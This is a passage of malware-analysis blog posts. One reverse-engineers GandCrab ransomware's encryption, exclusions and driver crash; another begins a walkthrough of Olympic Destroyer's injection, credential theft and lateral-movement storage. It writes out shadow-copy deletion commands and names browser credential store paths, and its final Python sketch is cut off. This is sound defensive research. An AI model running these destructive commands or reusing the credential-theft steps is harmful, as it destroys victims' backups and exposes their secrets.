With the subsequent call to concatUserInfoToRansomNote() at 0x00402C36 the rest of the ransom note is decrypted with the same XOR loop as before, but this time 0x10 is used as XOR key. Within this text the placeholder {USERID} is searched and substituted with the previously mentioned “ransom_id” (CRC32 over CPU name + Windows volume serial number). The {USERID} string is part of the path parameter of the URL of GandCrab’s hidden service: “http://gandcrabmfe6mnef.onion/{USERID}”

Thus, each machine infected with GandCrab gets a unique ransom note, where the link includes the identifier of the infected machine. Additionally, the ransom note holds all information needed to decrypt a file, if you have the private key belonging to the public key that is stored within GandCrab’s .data section.

It is funny to note that in concatUserInfoToRansomNote() not the already calculated and known ransom_id is used, but the whole previously mentioned internal structure containing information about the current system is built again. Only this time all but one of the bShouldFillDomainName bits are not set. So, the needed values are read and calculated a second time.

By calling startEncryptionsInThreads() at 0x0040211E, GandCrab starts several threads which take care of the encryption: The first thread starts at the function encryptNetworkThread() at 0x00402097, which will be described in the next subsection. Then, by calling prepareEncryption() at 0x00401D84, the driveInfos structure gets filled, containing the number of processors minus one (minimum one), the number of drives to encrypt and a list of drives to encrypt.

The list of drives to encrypt is filled by iterating over the alphabet (from A to Z), calling GetDriveTypeA() for each letter and checking if the drive type is DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_CDROM or DRIVE_RAMDISK. This specifically excludes all drives of type DRIVE_REMOTE, which should be already handled by the thread running encryptNetworkThread(). Back in startEncryptionsInThreads(), after prepareEncryption() has been executed, you can see in the for-loop that for each drive, addressed by its drive letter, (number of processors minus one) threads are spawned, which call the encryptLocalDriveThread() function at 0x00401D1C, which will be described in one of the following subsections.
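The selection logic of prepareEncryption() boils down to two small rules, sketched here in Python. The DRIVE_* values are the documented GetDriveType() return codes; the mapping from drive letter to type is passed in as a plain dictionary so the sketch runs anywhere, and the function names are mine.

```python
import string
from typing import Dict, List

# Return values of GetDriveTypeA()/GetDriveTypeW() as defined by the WinAPI
DRIVE_REMOVABLE = 2
DRIVE_FIXED = 3
DRIVE_REMOTE = 4
DRIVE_CDROM = 5
DRIVE_RAMDISK = 6

TARGET_TYPES = {DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_CDROM, DRIVE_RAMDISK}


def threads_per_drive(cpu_count: int) -> int:
    """Number of processors minus one, but at least one thread."""
    return max(cpu_count - 1, 1)


def select_drives(drive_types: Dict[str, int]) -> List[str]:
    """Walk A..Z and keep letters whose drive type is a local target."""
    return [
        letter
        for letter in string.ascii_uppercase
        if drive_types.get(letter) in TARGET_TYPES
    ]
```

For example, a machine with a fixed C:, an optical D: and a mapped network drive Z: yields only C and D; the remote drive is left to the network thread.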

The main thread then waits for all threads running on the current drive to finish by calling WaitForMultipleObjects(). As soon as one drive is finished and all according threads end, the next drive is encrypted with the same number of threads, and so on. At the end of the function, the main thread waits until the encryptNetworkThread()-thread has finished by calling WaitForSingleObject().

NETWORK ENCRYPTION – IM IN UR NETWORK, ENCRYPTING UR SHAREZ

The encryptNetworkThread() function at 0x00402097 does nothing more than resolving the computer’s name and providing this information to the function I called enumNetworksAndEncrypt() at 0x00401EA2 together with the crypto keys which were provided in the threadArgs structure. It is weird to see that the computer name is not actually used in the enumNetworksAndEncrypt() function. So maybe it was once used and the authors forgot to remove it, or it is part of an upcoming feature, which is still in development. Nonetheless, from the control flow point of view it makes no sense to query the computer name here.

¯\_(ツ)_/¯

So the actual beef we are looking for is in the function enumNetworksAndEncrypt(). The main part of this function looks like this:

The function has two parts, the upper half and the lower half, each marked by a call to WNetOpenEnumW(). In the first half, a maximum of 128 previously known network disks are enumerated by calling WNetOpenEnumW() with the RESOURCE_REMEMBERED and RESOURCETYPE_DISK arguments. Then, for each found network resource of type DISK, the function I called loopFoldersAndEncrypt_wrapper() at 0x00401E47 is executed. For each network resource of type RESOURCEUSAGE_CONTAINER, the currently executed function enumNetworksAndEncrypt() is executed recursively to further enumerate the network resources in the found container at the second half of the function.

The second half of the function does pretty much the same as the first half. The only two differences are that for the enumeration the argument RESOURCE_GLOBALNET is used, in order to enumerate the whole network and not only the previously used resources, and that the argument argument_NetResource is used in WNetOpenEnumW(), which makes the recursive calls possible. Note that in the first call to enumNetworksAndEncrypt() the argument_NetResource is zero, which starts the enumeration at the root of the network.

To sum it up:

GandCrab first enumerates and encrypts up to 128 network disks based on all “remembered (persistent) connections”, as MSDN calls them. Additionally, GandCrab enumerates and encrypts up to 128 network disks starting at the root of the local network. For each resource container a recursion is made.

ENCRYPTING LOCAL DRIVES – IM IN UR MACHINE, ENCRYPTING UR LOCAL DRIVEZ

The encryptLocalDriveThread() function at 0x00401D1C is nothing more than a wrapper around the loopFoldersAndEncrypt() function at 0x00405653, and forwards the crypto keys and the root of where the encryption should start. The function loopFoldersAndEncrypt() is not very pretty to look at, so there is no screenshot to describe everything in one picture, but rather several smaller screenshots. The function takes three arguments: The keys needed for encryption, the current path where the files and folders are to be iterated and a boolean value, which is used to avoid iterating and encrypting everything in paths containing the string “Program Files” or “Program Files (x86)”, unless the path additionally contains the string “SQL”.

Before starting to recursively iterate over files and folders, GandCrab does some checks on the current path by calling the function at 0x0040512C.

The function has two ways of returning a value: an output parameter and the classical ret-instruction with eax. If the current folder contains the string “Program Files” or “Program Files (x86)”, the value behind the pointer bProgramFiles_1 is set to “true”, which returns the information via an output parameter. If one of the other folders listed above is found, the function’s return value stored in bRet is set to “true” and returned via eax and a ret-instruction. Note that GandCrab tries to ensure that the system can still be booted by excluding the folders “Boot” and “Windows”, and tries to ensure you can still pay your ransom by not encrypting the Tor Browser files. It also spares all files installed in “Program Files” or “Program Files (x86)”, unless their path contains the string “SQL”, as you can see in the encryption loop later on.

Further on in loopFoldersAndEncrypt() it is then checked if the current path is in one of the special folders. If this is the case and the folder is not in “Program Files” or “Program Files (x86)”, the function returns, thus breaking the recursion and not encrypting the files in the current folder. In the next step, GandCrab creates the ransom note for the current folder with the hard-coded string KRAB-DECRYPT.txt and the text content which was previously calculated by calling 0x004053FD. In case the ransom note already exists, GandCrab also breaks the recursion by returning.
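The folder rules can be condensed into a small decision function, which is handy when estimating which parts of a disk image were in scope. This is a simplified sketch: the list of spared folders only contains the three names mentioned in the text (the full list is in the screenshot), plain substring matching is assumed, and the names check_path() and files_in_scope() are hypothetical.

```python
from typing import Tuple

PROGRAM_FILES_MARKERS = ("Program Files", "Program Files (x86)")
# Incomplete on purpose: only the folders named in the text.
SPARED_FOLDERS = ("Boot", "Windows", "Tor Browser")


def check_path(path: str) -> Tuple[bool, bool]:
    """Mimic the two return channels: (bRet, bProgramFiles)."""
    is_program_files = any(marker in path for marker in PROGRAM_FILES_MARKERS)
    is_spared = any(folder in path for folder in SPARED_FOLDERS)
    return is_spared, is_program_files


def files_in_scope(path: str) -> bool:
    """True if files directly inside `path` would be handed to encryption."""
    is_spared, is_program_files = check_path(path)
    if is_spared and not is_program_files:
        return False
    if is_program_files and "SQL" not in path:
        return False
    return True
```

Note that the real code keeps recursing below “Program Files” to find SQL folders, so this function models which files get encrypted, not where the recursion stops.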

After that, by calling the function at 0x00405525, a lock file is created by the following algorithm: By mangling the serial number of the drive where Windows is installed with the current day, month and week, as well as some constants, a string is created, which is unique for the current computer at the current day. This string is then used to create a file with the flag FILE_FLAG_DELETE_ON_CLOSE, which keeps the file alive as long as the current file handle is open. The handle is closed after the iteration step in the current folder is finished, thus deleting the file once the current folder and all its sub-folders have been encrypted. In case the file already exists, the recursion loop is broken by returning. This mechanism is used to synchronize the different threads running in parallel, so that only one thread encrypts the same folder. This means that the file is a marker that a thread is currently recursively running through the current folder. Note that this only works if GandCrab is not running over midnight, because a change in wDay and wDayOfWeek will change the file name.

¯\_(ツ)_/¯

However, the creation of the ransom note already provides a synchronization token, since it breaks the recursion in case a file with the name of the ransom note is already in the current folder. Additionally, there is another mechanism to avoid encrypting the same file twice later on.

The actual recursive loop for iterating over files and folders in loopFoldersAndEncrypt() is as simple as it can be: By using the WinAPI FindFirstFileW() (not in screenshot) and FindNextFileW(), GandCrab iterates over the content of the current folder. If a sub-folder is found, the current function calls itself recursively to iterate the sub-folder. For each file that is found, the function encryptFile() at 0x004054B8 is called. Note that the function behaves differently if the bSQLfoldersOnly variable is set. This is the case if the current folder is in “Program Files” or “Program Files (x86)”. If the folder then contains the string “SQL”, the recursion is executed with the third argument set to “true”, which then implicitly always sets the bSQLfoldersOnly to true. This ensures GandCrab does not encrypt anything in “Program Files” or “Program Files (x86)”, unless it has something to do with SQL.

DOUBLE CHECK TO ENCRYPT ONLY THE TARGETED FILES

The function I called encryptFile() first does several checks on the current file before it actually encrypts it. First, the current file’s name is copied and extended with the ending “.KRAB”. Then a check on the original file ending of the current file is done. Here the file ending blacklist mentioned before is used to avoid encrypting files with a certain file ending. Note that “.KRAB” is on that blacklist, so it avoids encrypting a file twice. Additionally, to keep the system running and bootable, no executables, DLLs, drivers, etc. are encrypted. Then, by calling bIsFilenameOnBlacklist, GandCrab checks if the current file is one of a hard-coded list of filenames. This once again ensures that the system stays bootable – you should be able to pay your ransom after all. But since GandCrab does not want to blacklist those files by their extension, because there could be user files with those extensions, GandCrab decided to exclude only a few specific files from encryption. If the file name is ok and the file has at least two bytes, the encryption is started by calling encryptionFunc() at 0x00401AA7. After the encryption, the file is renamed into the file name with the .KRAB ending by calling MoveFileW().

THE ACTUAL ENCRYPTION

The actual encryption of each file takes place in encryptionFunc(). There are two function arguments. The first is the path to the file to be encrypted and the second one is a pointer to a structure I called cryptKeys and is defined as follows:

> struct cryptKeys
> {
> void* pubkey;
> void* privkey;
> void* privkeySize;
> void* pubkeySize;
> keypairBuffer *keypairBuffer;
> };

Although the struct has several different members, only the pubkey and the pubkeySize are used here (remember that the private key buffer has already been freed at this point). For each file to be encrypted, a function call to 0x004019F8 creates a new random IV of 8 bytes and a symmetric key for the Salsa20 algorithm of 32 bytes (not in screenshot). Those two random values are then encrypted with the previously created RSA public key and stored in the structure I called encryptionInfoBlob in the following screenshot.

GandCrab reads the file in chunks of 1 MB, then adds the number of read bytes to the encryptionInfoBlob structure, encrypts the 1 MB blob, moves the file pointer back by 1 MB and writes 1 MB of encrypted data. In case less than 1 MB was read, the sizes are adapted accordingly and the loop finishes. Once the whole file is encrypted, GandCrab adds the encryptionInfoBlob structure to the end of the file. The structure looks like this:

> struct encryptionInfoBlob
> {
> byte encryptedSymkey;
> byte encryptedIV;
> LARGE_INTEGER encryptedBytes;
> }

So, each file is fully encrypted in chunks of 1 MB with Salsa20, no matter how big the file is. For each file a new Salsa20 key and IV are randomly created and then stored at the end of the file after they are encrypted with the RSA public key, which was newly created during the run of GandCrab. Additionally, the number of encrypted bytes is also added at the end of each file.
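When triaging encrypted samples, it helps to separate the trailer from the encrypted body. The sketch below does that under two assumptions that are not confirmed by the listing above: that the encrypted key and IV each occupy 0x100 bytes (the output size of a 2048 bit RSA operation), and that the LARGE_INTEGER is stored as a little-endian 64 bit value. split_trailer() is a hypothetical helper name.

```python
import struct

ENC_FIELD_SIZE = 0x100                   # assumption: one RSA-2048 block each
TRAILER_SIZE = 2 * ENC_FIELD_SIZE + 8    # key + IV + LARGE_INTEGER


def split_trailer(data: bytes):
    """Return (encrypted_body, trailer_fields) for a .KRAB file's content."""
    if len(data) < TRAILER_SIZE:
        raise ValueError("too short to contain an encryptionInfoBlob")
    body, trailer = data[:-TRAILER_SIZE], data[-TRAILER_SIZE:]
    (encrypted_bytes,) = struct.unpack_from("<q", trailer, 2 * ENC_FIELD_SIZE)
    fields = {
        "enc_symkey": trailer[:ENC_FIELD_SIZE],
        "enc_iv": trailer[ENC_FIELD_SIZE:2 * ENC_FIELD_SIZE],
        "encrypted_bytes": encrypted_bytes,
    }
    return body, fields
```

A quick plausibility check for the assumed layout is whether encrypted_bytes equals the length of the returned body.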

DELETESHADOWCOPIES

Once all encryption threads are finished, the control flow goes way back to the mainFunction(). Here GandCrab deletes the shadow copies of the system to ensure a victim cannot simply restore his/her files. On Windows Vista or later GandCrab executes “wmic.exe” with the parameter “shadowcopy delete”. On Windows XP it calls “cmd.exe” with the parameter “vssadmin delete shadows /all /quiet” via ShellExecuteW(). Before returning from the mainFunction() to the main(), GandCrab waits for the previously spawned network thread, which is trying to contact the C&C, to finish by calling WaitForSingleObject().

RANSOMWARE WITH A KERNEL DRIVER “EXPLOIT”

Back in main(), GandCrab calls the function I called AntiStealth() at 0x00401270. The backstory of this function seems to be a somewhat personal feud between the author(s) of GandCrab and the security vendor Ahnlab, who released a “vaccine” against GandCrab. The details can be read here: https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-author-bitter-after-security-vendor-releases-vaccine-app/

Previously, when analyzing the gathering of the system information during the MainFunction(), you could see an unused string taunting Ahnlab once again, saying there was a “full write-what-where condition with privelege escalation”, even providing a download link for an exploit proof of concept. In the blog post mentioned above, the alleged GandCrab author states that the “exploit will be an reputation hole for ahnlab for years”. We’ll see about that.

First, the AntiStealth() function parses the time stamp in the PE header of “%windir%\\system32\\ntoskrnl.exe” and saves it for later.

Second, the device with the path “\\.\AntiStealth_V3LITE30F” is opened by calling CreateFileW(). Note that this is the first bug in the driver: It does not set its access rights correctly if a random process without admin privileges can open a private kernel device. Then three heap buffers with R/W access rights are allocated by calling VirtualAlloc(), the first two of size 0x200, the third of size 0x10.

After that, GandCrab checks if it is running as Wow64 process and if so, it uses the Heavens Gate technique to call x64 functions of ntdll. On x64 it uses NtDeviceIoControlFile(), on x86 simply DeviceIoControl(), to communicate with the kernel device. The actual “exploit” can fit into a single screenshot:

First the IOCTL 0x82000010 is sent with the input buffer as seen above. Then a second IOCTL 0x8200001E is sent, which makes your system bluescreen if everything goes according to plan.

The exploit is also mentioned by https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html. In this blogpost Fortinet states that they “were able to confirm this on Ahnlab V3 Lite 3.3.46.1 with TSFltDrv.sys file version 9.6.0.5“. However, that is not correct: The two IOCTLs are not handled in TSFltDrv.sys, but in a driver called TfFRegNt.sys, of which I analyzed version 4.6.0.1 with the Sha256 2B07F2CA6FC566EF260D12B316249EEEBA45E6C853E5A9724149DCBEEF136839. In its x86 variant the driver has 275 functions, as identified by IDA, and exposes at least a file system minifilter driver functionality. The function which handles the IOCTLs is placed at 0x0040921C, and it handles the IOCTL used in the exploit like this:

Parsing the user buffer is done like this:

First, a check on the value I called bExInitializeResourceLiteSucceeded is executed. It marks that during initialization of the driver a call to the WinAPI ExInitializeResourceLite() was successful. Then, by accessing the global variable I called kernelBase, which stores a copy of ntoskrnl.exe, which is read during initialization, and by executing the function getNtoskrnTimeStamplDword() at 0x0040318E, the time stamp in the PE header of ntoskrnl.exe is extracted.

If the second DWORD of the buffer from user space is the correct time stamp, the global variable I called userBufferFirstDWORD is set to the first DWORD in the user buffer. Comparing this functionality with GandCrab’s code, the variable userBufferFirstDWORD is now set to 0xDEADBEEF.

The second IOCTL is handled like this:

At first, the user buffer is interpreted as a structure, which I called userObj. It has, besides other unimportant members, a length and a “buf”. With this information, several size and sanity checks are executed to ensure that the userObj does not exceed 0xff bytes in size. With the following function call to checkBufferRanges() at 0x0040912E, the driver ensures that userObj is within the user provided buffer.

Afterwards, the driver calls handleUserBuffer() at 0x00408F76 in order to process the user input. The first two function calls map the MDL address of the IRP to a virtual address and then deserialize a string from the user buffer into a custom object which I called memObj. The memObj, as well as the mapped memory of the MDL and the second element of the userObj are then passed to another function which I called thisWayGoesToCrash() at 0x004052EA.

The first function call to findObjectInList() at 0x00406996 looks up a file handle by iterating over a driver internal linked list, comparing the list objects based on the user input. If some object is found, the function ExAcquireResourceSharedLite_onUserBuffer() at 0x0040606A is called:

You might notice that the first argument of ExAcquireResourceSharedLite() is userBufferFirstDWORD, the very same buffer which was set with the first IOCTL. When the function call ExAcquireResourceSharedLite() is executed, Windows bluescreens. The crash dump analysis of Windbg looks like this:

Note that the first argument is 0xDEADBF23, which is similar to the address 0xDEADBEEF, which was the first argument of ExAcquireResourceSharedLite(). Looking at the function in Ntoskrnl to see where the crash actually happened, we can see this code:

The red marked area is where the crash happened. You can see a few lines above that ecx got loaded by the instruction “lea ecx, [edi+34h]”, while edi was holding the first function argument. So 0xDEADBEEF + 0x34 = 0xDEADBF23, which is the memory referenced, which caused the crash.

So, what is happening in Ahnlab’s driver? With the first IOCTL, you can give the kernel driver a pointer to an object which the kernel driver expects to be an ERESOURCE pointer. With the second IOCTL, the driver tries to acquire the resource object, and thus crashes.

Is this really a “full write-what-where condition with privelege escalation” as the GandCrab authors state? In my humble opinion, no. There is no fully controllable write primitive and the exploit does not show any privilege escalation. You can specify an arbitrary memory location on which the WinAPI ExAcquireResourceSharedLite() gets executed. So, whatever the API does with the ERESOURCE object, you can do to an arbitrary memory location. In theory, a very skilled attacker might be able to use this to manipulate a memory address as one gadget. But without any further gadgets, it is very hard to create some kind of real working exploit out of this.

So, I would say this is rather a denial of service bug, than a full write-what-where privilege escalation security issue.

COVERING ITS TRACKS

In case the driver bug did not bluescreen the system, GandCrab tries to delete itself by calling the function deleteSelfWithTimeout() at 0x004032CE.

It opens a new command line process, which first calls “timeout -c 5” and then deletes the current file from which GandCrab was started. After the command line process has been started, GandCrab ends its process by calling ExitProcess(). The intention of the timeout is most probably to give the current process enough time to end itself, before the newly started command line tries to delete it. It is funny to note that the command “timeout” has no switch “-c”. I could not make the timeout work with “-c” on Windows XP, 7, 8 or 10. ¯\_(ツ)_/¯ Nonetheless, in all my tests the start of the new process took a few milliseconds longer than exiting the GandCrab process, which is why the deletion always worked, although it is very racy.

CONCLUSION

When analyzing GandCrab, I was fascinated by the simplicity of the malware in comparison to its efficacy. This malware does exactly what it aims to do: Encrypt as many files as possible as fast as possible with a strong encryption algorithm. There is not too much unnecessary code, e.g. there is no persistence to survive reboots.

One oddity that sticks out is the kernel driver exploit, which is probably intended to show off the GandCrab author(s)’ skills in order to gain a big media echo, which is important to support GandCrab’s affiliate model.

Author Robert Michel Posted on November 12, 2018

Find the code here: https://github.com/GDATAAdvancedAnalytics/bindifflib

Author Luca Ebach Posted on September 21, 2018 Categories meta Tags binary analysis, Bindiff

DISSECTING OLYMPIC DESTROYER – A WALK-THROUGH

INTRODUCTION

After a destructive cyber attack had hit this year’s olympics, the malware was quickly dubbed _Olympic Destroyer._ Talos were fast to provide initial coverage. A malware explicitly designed to sabotage the computer systems of the Olympic opening ceremony sounded very interesting, but other duties were more pressing at that time, so analysis for pure curiosity had to wait. A few weeks later I had some free evenings on my hands and decided to combine a few interests of mine: Listening to music, consuming high quality whisky and analyzing malware – regrettably one of those things is frowned upon at work, and it’s not malware analysis.

I had most of the binaries reversed and already written up a few pages, when Kaspersky released an article with some more details than previously publicly known. Having finished my work and focusing on the technical aspects of Olympic Destroyer, I think I can add several technical details about the malware. In the following expect plain and straight-forward binary analysis and reverse engineering in the form of a walk-through.

Olympic Destroyer comes in two types. The first one is a little bit simpler. It was discovered by Talos, who published it in their comprehensive blog post. One example of this type has the Sha256 of edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9. The second type of the binary has, to the best of my knowledge, not yet been explicitly named, but it was implicitly analyzed by Kaspersky in their also very comprehensive blog post. One example has the Sha256 sum of e8349cfcc422310c259688b0226cb14f5196a6daad77b622405282aeac89ab06.

In the following blog post I will mainly describe the first type of Olympic Destroyer. At the end I will discuss the main differences between the two types, which revolve around the usage or non-usage of the well-known tool PsExec.

THE ORCHESTRATOR

In this part we will cover the innermost functionality of the Olympic Destroyer. As orientation point we will use the _main()_ function, from where on we will cover the single function calls step by step. Luckily Olympic Destroyer runs single threaded – except for the spreading functionality – which makes it easier to follow the execution one call after another. The analyzed orchestrator has a Sha256 of edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 and is 0x1C6800 (~1.7MB) in size. A lot of this size is made up of five resources, whose role will be explained later on. IDA detects 756 functions of which not even ten were automatically identified by IDA FLIRT in version 6.9, which made the analysis more time consuming. IDA version 6.95 seems to have a newer FLIRT database and a lot of functions are identified automatically, as I realized way too late.

CONFIGURATION – OR NOT

The _main()_ function is located at 0x004071E0. It creates a structure on the local stack, which I called “config” when starting to reverse the binary. Over time I discovered that it is merely a state or a singleton data container – nonetheless I kept the name “config” for reasons of consistency. This structure is carried throughout many of the subsequent function calls, most of the time in the form of _thiscalls_ in the _ecx_ register. You can find the whole structure in the appendix section below. It contains different types of data, like simple integers, which for example describe the bitness of the OS with either the value 32 or 64 by dynamically resolving and calling _IsWow64Process_. Yes, the author(s) actually use full integers instead of encoding this information in a simple bit ¯\_(ツ)_/¯.

Detecting the bitness of the system

More interesting are probably the different paths of files dropped to the filesystem during runtime, which are also stored in this structure. I will describe them when writing about the resources. Additionally, we find some security related variables, like the security token information of the current user, which is gathered by calling _GetTokenInformation(TokenUser)_ and comparing the result against “S-1-5-18” (Local System), “S-1-5-19” (NT Authority Local Service), and “S-1-5-20” (NT Authority Network Service). Most important is probably the vector of objects, which contains domain names and domain credentials, that are used to spread laterally through the network. More about this later on when I will cover the lateral movement.
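The comparison against the three well-known SIDs amounts to a simple lookup. As a small illustration, assuming the user SID is already available in its string form, it could be expressed like this (classify_sid() is a name I made up for this sketch):

```python
from typing import Optional

# The three well-known service account SIDs named above
SERVICE_SIDS = {
    "S-1-5-18": "Local System",
    "S-1-5-19": "NT Authority Local Service",
    "S-1-5-20": "NT Authority Network Service",
}


def classify_sid(sid: str) -> Optional[str]:
    """Return the account name for a well-known service SID, else None."""
    return SERVICE_SIDS.get(sid.strip().upper())
```

Any regular user SID, for example one starting with S-1-5-21, falls through and yields None.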

After the config structure is initialized in 0x00406390 by nulling its members, it is dynamically filled with its respective values in the subsequent call to 0x00406500, where most of the previously mentioned values and information are generated. From then on, the config is ready for use and most values are only read instead of written – except for the file paths, which are generated more or less randomly on the fly when used, and of course the credential vector, which gets expanded a few calls later.

MAGICAL CODE INJECTIONS

With a call to 0x004066C0 Olympic Destroyer checks for the existence of two files, which it uses to mark and avoid multiple runs of itself:

* C:\
* %SystemDrive%\Users\Public\

If one of those files is found, the function which I called “selfDeleteInjectBinary” at 0x00405DD0 is executed. Most of this function is already described in Endgame’s blogpost at https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights, but somehow they either misinterpreted the feature, or missed the main point of the shellcode. I’m not sure what their intention was, but their blog post somehow does not say what the shellcode actually does ¯\_(ツ)_/¯.

Olympic Destroyer starts an invisible “notepad.exe” by using the flags _CREATE_NO_WINDOW_ in _dwCreationFlags_ as well as _STARTF_USESHOWWINDOW_ in _StartupInfo.dwFlags_ and _SW_HIDE_ in _StartupInfo.wShowWindow_ before calling _CreateProcessW_.

[Figure: Starting an invisible Notepad]

Then it injects two blocks of data/code into the running notepad by calling _VirtualAllocEx_ and _WriteProcessMemory_. The first block contains addresses of APIs and the path to the current executable, the second one is a shellcode which uses the addresses of the first block. By calling _CreateRemoteThread_ the execution of the shellcode within notepad is started.

After this injection, the main process exits by calling _ExitProcess_ while the execution of the injected thread runs in the process space of notepad. But all the shellcode does is implement a simple delayed self-deletion mechanism: First it sleeps a configurable number of seconds. In our case it is five seconds. After that, the shellcode looks for the original path of Olympic Destroyer, which was passed in the first injected memory block, by checking _GetFileAttributesW_ != _INVALID_FILE_ATTRIBUTES_. Then it tries to open the file with _CreateFileW_, gets the file size by calling _GetFileSize_ and then loops over the file size, calling _WriteFile_ with a single zero byte each time until the whole file is overwritten with zeros. After closing the file handle, the file is finally deleted with _DeleteFile_ and the shellcode calls _ExitProcess_ to end its execution.

To sum it up: The code injection is simply a nulling and deletion mechanism to hide the traces of the main binary.

SETTING THE MARKERS FOR SELF-DELETION

The two files which mark multiple runs of Olympic Destroyer, mentioned in the previous paragraph, are then created:

[Figure: Create infection markers]

Depending on the rights under which the binary is running, the markers in _C:\_ and _%COMMON_DOCUMENTS%_ are created. From then on, a second run of Olympic Destroyer will wipe the original executable.

STEALING CREDENTIALS

In the following call to 0x004065A0, we will dive into a very important feature of Olympic Destroyer: The stealing of credentials from the current system, which are later used for lateral movement.

Olympic Destroyer contains five resources of type “BIN”. All of those resources are encrypted with AES. The calculation of the key is hard coded in the binary and can be described as a trivial MD5 hash of the string “123”. This hash is then concatenated twice in order to reach a key length of 256 bits for the AES algorithm. The evaluation of whether those shenanigans of symmetric cryptography with a hard coded key make sense is left as an exercise for the reader.

When stealing the credentials, resource 101 is first decrypted and written to a more or less randomly generated filename in %tmp%. “More or less” because the algorithm is based on calls to _GetTickCount()_ with _Sleeps_ in between the calls. After writing the decrypted resource to disk, a proper random string is generated by calling _CoCreateGuid_. The _GUID_ is then used as the name for a named pipe in the form _\\.\pipe\_, which is created by calling _CreateNamedPipeW_ and then used as an inter-process communication mechanism with the process which is then started from the file written to %tmp%.
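The key derivation described above (an MD5 hash of “123”, concatenated with itself to reach 256 bits) can be sketched in a few lines of Python. This is only an illustration under assumptions: it assumes the raw 16-byte digest is doubled (rather than its hex string) and that the password is ASCII encoded. The function name `derive_aes_key` is made up for this example, and the AES mode and IV are not covered here since the text does not state them.

```python
import hashlib


def derive_aes_key(password: str) -> bytes:
    """Return a 32-byte key: the 16-byte MD5 digest of the password, repeated twice.

    Assumption: the raw digest (not its hex representation) is concatenated.
    """
    digest = hashlib.md5(password.encode("ascii")).digest()  # 16 bytes = 128 bits
    return digest + digest  # 32 bytes = 256 bits


key = derive_aes_key("123")
print(len(key) * 8, "bit key:", key.hex())
```

Since the password is a constant, anyone holding the binary can derive the same key, which is why the encryption only hides the resources from a casual look.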

RESOURCE 101

When resource 101 is started, it also gets the name of the pipe to communicate with its parent process as well as the password “123” as arguments. The main task of resource 101 is to use the password to decrypt and execute another resource of type “BMP” embedded in the file of resource 101 and send a buffer with stolen credentials to its parent process. So, it’s a simple loader which transfers a buffer via IPC.

The BMP resource is a DLL called “BrowserPwd.dll”. This DLL is not written to disk but parsed and loaded in memory. It seems that its only purpose is to steal credentials from the browsers Internet Explorer, Firefox and Chrome. In order to work with Firefox and Chrome, an SQLite library is compiled into the DLL, which makes up most of the DLL’s code.

* For Internet Explorer it uses COM to iterate over the browser’s history and then reads all autocomplete passwords from the registry in _Software\Microsoft\Internet Explorer\IntelliForms\Storage2_ and decrypts them using the WinAPI _CryptUnprotectData_.
* For Firefox, the credentials are stolen from _sqlite_ and _logins.json_. The _nss3.dll_ from Firefox is used to decrypt the protected passwords.
* For Chrome, the user’s database in _\Application Data\Google\Chrome\User Data\Default\Login Data_ is copied temporarily and then the credentials are read and decrypted by calling the WinAPI _CryptUnprotectData_.

All stolen credentials are returned in a buffer which uses a special style of separating the single items. This buffer is constructed within the DLL and returned to its original loader, which is resource 101:

[Figure: Stolen credentials are formatted in a certain way]

This buffer is then sent from the loader via the named pipe to its parent process:

[Figure: The loader of resource 101 uses the named pipe to transfer the buffer with the stolen credentials]

RESOURCE 102 AND 103

After resource 101 was executed, a second attempt to steal credentials is started, provided the current process could acquire debug privileges during initialization of the config object. If it has those rights, depending on the architecture of the operating system, either resource 102 (x86) or 103 (x64) is started. Both executables have the same logic as resource 101 – decrypt and load a DLL in memory, execute the DLL and return its buffer via IPC – only the payload in form of their internal DLL, the resource of type “BMP”, is different. Everything else stays the same.

So, the question is, what are the DLLs in the resources of resource 102 and 103? For 103, the x64 version, I did not look into it in order to save some time, but I assume it’s the very same payload as in 102, only for x64 systems. For 102, which is an x86 binary, the loaded internal DLL seems to be a custom version of the well-known penetration testing tool Mimikatz, which, besides other nifty features, can dump credentials from a Windows system. I did not spend too much time on the analysis of this DLL, but a swift look (as in “1-2 hours”) revealed several functions, structures and strings matching the original code of Mimikatz, which are strong indicators that this DLL actually has Mimikatz’ credential dumping capability. This assumption was also verified by dynamic analysis, where the binary was actually stealing the credentials of my analysis machine. Additionally, the author(s) of Olympic Destroyer named this DLL “kiwi86.dll”, which is a reference to the nickname “gentilkiwi”, who is the author of Mimikatz.

After receiving the stolen credentials via the named pipes, Olympic Destroyer parses the received buffers and saves the credentials in its config structure. Then it returns its control flow to the main function.

SAVING THE CREDENTIALS – OR HOW TO BUILD A NETWORK WORM

Back in the main function, right after stealing credentials from browsers and by the power of Mimikatz, Olympic Destroyer creates a copy of itself in the %tmp% folder in 0x00404040. If this copy succeeds, the copied file is modified in the next function call to 0x00401FB0. Here the whole file is read into a buffer in the process’ memory. Then this buffer is searched for the byte marker _9E EC 87 D4 89 16 42 09 55 E2 74 E4 79 0B 42 4C_. Those bytes mark the beginning of the serialized credentials vector as an array:

[Figure: Hex dump of Olympic Destroyer]

I tried to mark the single elements of the array in different colors to describe them, but it turns out my MS Paint skills are really bad. So, you’ll just get two pseudo structs defining what you can see around the red marked bytes:

> _struct credentials_
> _{_
> _ byte marker;_
> _ WORD numberOfElements;_
> _ CREDENTIAL credentialArray;_
> _};_

> _struct CREDENTIAL_
> _{_
> _ WORD lengthOfUsername;_
> _ WORD lengthOfPassword;_
> _ char userName;_
> _ char password;_
> _};_
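To make the layout of the two pseudo structs more tangible, here is a minimal Python sketch that serializes and parses such an array. It rests on several assumptions that the structs above do not spell out: the WORDs are taken to be little-endian, the length fields count bytes, the strings carry no terminator, and the elements follow each other without padding. The function names and the sample credentials are hypothetical.

```python
import struct

# 16-byte marker that precedes the serialized credentials array
MARKER = bytes.fromhex("9E EC 87 D4 89 16 42 09 55 E2 74 E4 79 0B 42 4C")


def serialize_credentials(creds):
    """Build marker + WORD count + (WORD ulen, WORD plen, user, password)*."""
    out = bytearray(MARKER)
    out += struct.pack("<H", len(creds))  # numberOfElements (assumed little-endian)
    for user, password in creds:
        out += struct.pack("<HH", len(user), len(password))
        out += user + password
    return bytes(out)


def parse_credentials(blob):
    """Locate the marker in a buffer and read back the credential pairs."""
    start = blob.find(MARKER)
    if start < 0:
        raise ValueError("marker not found")
    pos = start + len(MARKER)
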